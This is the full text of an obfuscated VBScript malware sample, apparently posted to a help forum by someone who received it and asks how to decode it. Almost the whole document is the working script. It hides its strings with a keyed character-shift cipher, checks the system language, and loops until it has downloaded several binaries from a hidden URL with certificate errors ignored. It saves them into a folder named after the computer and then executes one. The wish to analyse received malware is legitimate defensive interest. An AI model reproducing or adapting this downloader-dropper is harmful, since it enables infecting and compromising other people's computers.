Option Explicit
On Error Resume Next
dim rbs309
dim tadjakmnmfrg4460
dim icsnvk206
dim wsmp1276
dim falkal1610
dim rfqgobyeyrp5319
dim gtxhgi5556
dim mll8810
dim qxat8709
dim hgurgqrv3280
dim baknqdo6857
dim cioslu3564
dim sndohhjq1214
dim lwwfaim8338
dim haprm493
dim iltkfxbb2382
dim dhydlcp7543
dim qpdu6740
dim gtlbowwr6975
dim xcyi8081
dim isfotb6795
dim uguojbssq5199
dim dycbyrmy5608
dim suqmi6111
dim mojspk6072
dim gwjdvxqxpi1867
dim syc9022
dim cwnilskntu6156
dim jycej9917
dim kaumen4761
dim hpml9179
dim stwjmww5737
dim mju2625
dim idmndh94
dim lkrm5932
dim kfdvhjl9992
dim fyv2635
dim njuv4832
dim ygvhoo991
dim twfygbvnne8124
dim kwjktixh825
kwjktixh825 = "ijn34g"
rbs309 = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))
tadjakmnmfrg4460 = uckp9923(fdhtrhou8434(""))
icsnvk206 = uckp9923(fdhtrhou8434("šÝ›—•ÖÕ"))
wsmp1276 = uckp9923(fdhtrhou8434("ÔÜݪ¨Ì·˜â£Ù̽Å"))
falkal1610 = uckp9923(fdhtrhou8434("ÕÖÓ›‡•ÝÚ×¥—ºÀ"))
rfqgobyeyrp5319 = uckp9923(fdhtrhou8434("Õ×â›b—"))
gtxhgi5556 = uckp9923(fdhtrhou8434("ÐÚØa—"))
mll8810 = uckp9923(fdhtrhou8434("¹º¯X"))
qxat8709 = uckp9923(fdhtrhou8434("Ž«Âtx"))
hgurgqrv3280 = uckp9923(fdhtrhou8434("ÏÓÕa¬"))
baknqdo6857 = uckp9923(fdhtrhou8434("ÖËÓ¥¨º—¬²‚x¨"))
cioslu3564 = uckp9923(fdhtrhou8434("ÝÍÓ–¶ÖÏ⦺ÎÖ×ybÎ×Óâ£Ù̽"))
sndohhjq1214 = uckp9923(fdhtrhou8434("‰ÝS™ßΘ f¦ÝÜÑÓ¥"))
lwwfaim8338 = uckp9923(fdhtrhou8434("ÍÓ"))
haprm493 = uckp9923(fdhtrhou8434("Õ×â›bÊ"))
iltkfxbb2382 = uckp9923(fdhtrhou8434("Õ×â›b"))
dhydlcp7543 = uckp9923(fdhtrhou8434("š˜£a¨ÚÎßߘ†×ÝÞ¶¡¾—Úâ§|ÕÒÁ"))
qpdu6740 = uckp9923(fdhtrhou8434("™˜Ÿb¦ÌÝÞÓš“àÛËÜœ–"))
kfdvhjl9992 = uckp9923(fdhtrhou8434("ÅÍן–ܹÆᥙھƨv"))
fyv2635 = uckp9923(fdhtrhou8434("ÅÝà˜§¼‰ÖÚtÚÐØק¨Ì¼ŠÒ¡•‡ÜÞܘ¡ÜÌÙ²nª"))
njuv4832 = uckp9923(fdhtrhou8434("Åâ"))
twfygbvnne8124 = 1046
buoyc2863 = uckp9923(fdhtrhou8434("½½½ƒ"))
Function fdhtrhou8434(Str)
str = Replace(str,"@","")
fdhtrhou8434 = str
End Function
Function uckp9923(Str)
Dim dxjc2225, mpbx3317, lww1640, ogngfnwbr3141, rbtac94, umr8295, iael1408, lbf7910
rbtac94 = ""
dxjc2225 = Len(kwjktixh825)
mpbx3317 = 1
lww1640 = Len(Str)
str = StrReverse(str)
For ogngfnwbr3141 = lww1640 To 1 Step -1
umr8295 = asc(Mid(str,ogngfnwbr3141,1))
iael1408 = Asc(Mid(kwjktixh825,mpbx3317,1))
rbtac94 = rbtac94 & chr(umr8295 - iael1408)
lbf7910 = 1
mpbx3317 = mpbx3317+lbf7910
lbf7910 = 1
If mpbx3317 > dxjc2225 Then
mpbx3317 = lbf7910
Next
rbtac94 = StrReverse(rbtac94)
uckp9923 = rbtac94
End Function
gtlbowwr6975 = chr(34)
set xcyi8081 = CreateObject(wsmp1276)
Set isfotb6795 = WScript.CreateObject(falkal1610)
dycbyrmy5608 = xcyi8081.ComputerName
Set mojspk6072 = CreateObject(cioslu3564)
if mojspk6072.FolderExists(kfdvhjl9992) then
uguojbssq5199 = kfdvhjl9992 & Left(dycbyrmy5608, 3) & njuv4832
else
uguojbssq5199 = fyv2635 & Left(dycbyrmy5608, 3) & njuv4832
end if
suqmi6111 = uguojbssq5199 & Left(dycbyrmy5608, 3) & hgurgqrv3280
Function BinaryGetURL(strURL)
Dim objWinHttp
Dim lngTimeout
Dim strMethod
Dim strPostData
Dim strUserAgentString
Dim intSslErrorIgnoreFlags
Dim blnEnableRedirects
Dim blnEnableHttpsToHttpRedirects
lngTimeout = 59000
strMethod = "GET"
strPostData = ""
intSslErrorIgnoreFlags = 13056
blnEnableRedirects = True
blnEnableHttpsToHttpRedirects = True
Set objWinHttp = CreateObject(dhydlcp7543)
objWinHttp.SetTimeouts lngTimeout, lngTimeout, lngTimeout, lngTimeout
objWinHttp.Option(0) = qpdu6740
objWinHttp.Option(4) = intSslErrorIgnoreFlags
objWinHttp.Option(6) = blnEnableRedirects
objWinHttp.Option(12) = blnEnableHttpsToHttpRedirects
objWinHttp.Open strMethod, strURL, False
If strMethod = "buoyc2863" Then
objWinHttp.setRequestHeader "Content-type", _ "application/x-www-form-urlencoded"
End If
objWinHttp.Send strPostData
If (objWinHttp.Status = 200) Then
BinaryGetURL = objWinHttp.ResponseBody
End If
Set objWinHttp = Nothing
End Function
Function SaveBinaryData(arrByteArray, strFN)
dim ryu9878, vocehkn515
ryu9878 = strFN
vocehkn515 = 2
If VarType(arrByteArray) >= 8192 Then
Dim objBS
Set objBS = CreateObject(baknqdo6857)
with objBS
.Type = 1
.Open()
.Write(arrByteArray)
.SaveToFile ryu9878 , vocehkn515
End With
End If
End Function
Set stwjmww5737 = GetObject(uckp9923(fdhtrhou8434("›àÛœ—ÃÝÙÝ¥•ÅÆ°™ÛÊØݦ¦ÌÙ××p ÌßϺ¡£ÐÝËÜ¢§ÙÎÚÛœ¯¡ÜÞÛš¡ÕÒá")))
Set mju2625 = stwjmww5737.ExecQuery(uckp9923(fdhtrhou8434("ÖÏ⦺ÐØק•ÙÎÚ½’fš×ÓÅS¡ÖÛÐŽ]TÛÌÏÚ˜‡")))
For Each idmndh94 in mju2625
lkrm5932 = idmndh94.OSlanguage
Next
mojspk6072.CreateFolder(uguojbssq5199)
If (mojspk6072.FileExists(uguojbssq5199 & lwwfaim8338) = false and twfygbvnne8124 = lkrm5932) Then
Set gwjdvxqxpi1867 = mojspk6072.OpenTextFile(uguojbssq5199 & lwwfaim8338,8,true,false)
gwjdvxqxpi1867.WriteLine icsnvk206
gwjdvxqxpi1867.Close
Do
SaveBinaryData BinaryGetURL(rbs309 & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "k"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "k") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "o" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "o"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "o") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "e" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "e"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "e") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & haprm493), suqmi6111
Loop Until mojspk6072.FileExists(suqmi6111) = true
isfotb6795.run sndohhjq1214 & gtlbowwr6975 & suqmi6111 & gtlbowwr6975 & " " & tadjakmnmfrg4460
End If
I received a virus made in vbscript and would like to learn how to decrypt it. I would like to know what steps or subjects I need to study or research to decrypt this. And if there is a site or program that does this, I thank anyone who can help me.